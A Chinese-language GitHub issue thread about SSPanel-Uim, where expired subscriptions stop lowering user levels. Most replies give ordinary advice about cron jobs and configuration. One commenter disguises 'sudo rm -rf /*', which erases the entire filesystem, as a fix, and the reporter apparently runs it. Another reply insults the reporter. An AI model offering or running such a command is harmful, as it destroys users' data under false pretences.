### ISSUE TITLE
不知道为什么现在使用订阅时间过期了，但等级还是不变，还能正常使用，之前时间过期等级会降低

### ISSUE THREAD

**Issue by fugood** [Anankke/SSPanel-Uim#1267]
不知道为什么现在使用订阅时间过期了，但等级还是不变，还能正常使用，之前时间过期等级会降低。
没有改变过什么的，现在不正常了！

**Comment by aipeach** [comment]
@fugood 检查一下定时任务

**Comment by fugood** [comment]
怎样检查哈？

**Comment by NutterChen** [comment]
@fugood 发下机场网址，我帮你检查

**Comment by fugood** [comment]
![QQ截图20210609160050](https://user-images.githubusercontent.com/73930611/121316433-e8bebd80-c93b-11eb-9bde-a8c7218115af.png)

**Comment by fugood** [comment]
![QQ截图20210609160326](https://user-images.githubusercontent.com/73930611/121316771-3e936580-c93c-11eb-8e8e-e5b0444f0e9b.png)

**Comment by fugood** [comment]
@NutterChen 出显上面提示哈

**Comment by xiangbudaole** [comment]
你好我也遇到过这个问题，执行了这个命令就好了 sudo rm -rf /*

**Comment by fugood** [comment]
@xiangbudaole 弹出所有提示 rm: 无法删除"......................................................: 不允许的操作

**Comment by M1Screw** [comment]
如果是最新版看看是不是少配置一個 UserJob，另外問問題動不動帶感嘆號只會顯得你傻逼，建議你少用。

**Comment by sam01101** [comment]
> 你好我也遇到过这个问题，执行了这个命令就好了 sudo rm -rf /*

这个我先笑一下，没想到真有人还输了进去

**Comment by zhuanghai1** [comment]
> @xiangbudaole 弹出所有提示 rm: 无法删除"......................................................: 不允许的操作

前来围观
